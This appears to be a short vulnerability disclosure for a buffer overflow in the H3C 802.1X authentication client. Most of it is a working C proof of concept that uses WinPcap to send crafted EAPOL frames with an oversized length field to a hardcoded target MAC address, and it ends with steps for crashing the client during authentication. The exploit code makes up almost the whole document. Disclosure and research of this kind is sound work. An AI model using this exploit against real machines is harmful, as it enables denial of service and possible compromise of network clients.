The H3C 802.1X client does not validate the key data, causing a buffer overflow in the sub_4030E0 function. The memcpy call is at 4031F6. If the length argument of that memcpy is maliciously constructed, the buffer overflows; the PoC code is as follows:
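#include <pcap.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <tchar.h>
#pragma comment(lib, "wpcap.lib")

enum {
    PKT_BUF_SIZE    = 3000,  /* scratch buffer for building the frame */
    FRAME_LEN       = 100,   /* bytes of the buffer actually put on the wire */
    SNAPLEN         = 65536, /* capture length; irrelevant for a send-only handle */
    READ_TIMEOUT_MS = 1000
};

/*
 * Transmit one frame of `len` bytes on the open handle.
 *
 * Returns 0 on success; on failure prints pcap's error text to stderr and
 * returns -1. Factored out because the original repeated the same
 * send-and-report sequence three times.
 */
static int send_frame(pcap_t *fp, const u_char *packet, int len)
{
    if (pcap_sendpacket(fp, packet, len) != 0) {
        fprintf(stderr, "\nError sending the packet: %s\n", pcap_geterr(fp));
        return -1;
    }
    return 0;
}

/*
 * Entry point: enumerate the adapters, open the first one and emit the three
 * crafted EAPOL frames (ethertype 0x888e) from the write-up.
 *
 * argc/argv are not used; the first enumerated adapter is always chosen
 * (the original printed argv[1] in the open-failure message even though
 * alldevs->name was the device actually opened).
 *
 * Returns 0 on success, 1 if adapters cannot be enumerated, 2 if the first
 * adapter cannot be opened (or none exists), 3 if a send fails.
 * The device list is always released with pcap_freealldevs(), which the
 * original leaked.
 */
int _tmain(int argc, _TCHAR *argv[])
{
    pcap_if_t *alldevs = NULL;
    pcap_t *fp = NULL;
    char errbuf[PCAP_ERRBUF_SIZE];
    u_char packet[PKT_BUF_SIZE];
    int rc;

    (void)argc;
    (void)argv;

    /* Check that WinPcap can enumerate adapters at all. */
    if (pcap_findalldevs(&alldevs, errbuf) == -1) {
        fprintf(stderr, "Error in pcap_findalldevs: %s\n", errbuf);
        return 1;
    }

    /* Print the list */
    int i = 0;
    for (pcap_if_t *d = alldevs; d != NULL; d = d->next) {
        printf("%d. %s", ++i, d->name);
        if (d->description) {
            printf(" (%s)\n", d->description);
        } else {
            printf(" (No description available)\n");
        }
    }

    /* pcap_findalldevs() can succeed with an empty list; guard before deref. */
    if (alldevs == NULL) {
        fprintf(stderr, "\nNo adapters found\n");
        rc = 2;
        goto out_free;
    }

    /* select the corresponding NIC: the first one in the list */
    fp = pcap_open_live(alldevs->name, SNAPLEN, 1 /* promiscuous */,
                        READ_TIMEOUT_MS, errbuf);
    if (fp == NULL) {
        fprintf(stderr,
                "\nUnable to open the adapter. %s is not supported by WinPcap\n",
                alldevs->name);
        rc = 2;
        goto out_free;
    }

    memset(packet, 0, sizeof packet);

    /* target machine mac address */
    packet[0] = 0x00; packet[1] = 0x0C; packet[2] = 0x29;
    packet[3] = 0x0F; packet[4] = 0x63; packet[5] = 0xDD;
    /* set mac source to 2:2:2:2:2:2 */
    memset(packet + 6, 2, 6);
    /* protocol header: ethertype 0x888e (EAPOL) followed by the EAPOL
     * version/type/length bytes and payload from the write-up. The 0xFFFF
     * at bytes 16-17 is presumably the length the client copies without
     * bounding it by the received frame size -- confirm against sub_4030E0;
     * a fixed client would reject any length larger than the frame. */
    packet[12] = 0x88; packet[13] = 0x8e;
    packet[14] = 0x01; packet[15] = 0x00;
    packet[16] = 0xFF; packet[17] = 0xFF;
    packet[18] = 0x01; packet[19] = 0x03; packet[20] = 0x05;

    rc = 3; /* any failed send exits with the original's code 3 */
    if (send_frame(fp, packet, FRAME_LEN) != 0) {
        goto out_close;
    }

    packet[22] = 0x07;
    if (send_frame(fp, packet, FRAME_LEN) != 0) {
        goto out_close;
    }

    packet[18] = 0x0A; packet[19] = 0x03; packet[20] = 0x05;
    /* Send down the packet */
    if (send_frame(fp, packet, FRAME_LEN) != 0) {
        goto out_close;
    }
    rc = 0;

out_close:
    pcap_close(fp);
out_free:
    pcap_freealldevs(alldevs);
    return rc;
}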
Run the client, enter the user name and password, click to start authentication, then run the attack code. The client program overflows and crashes.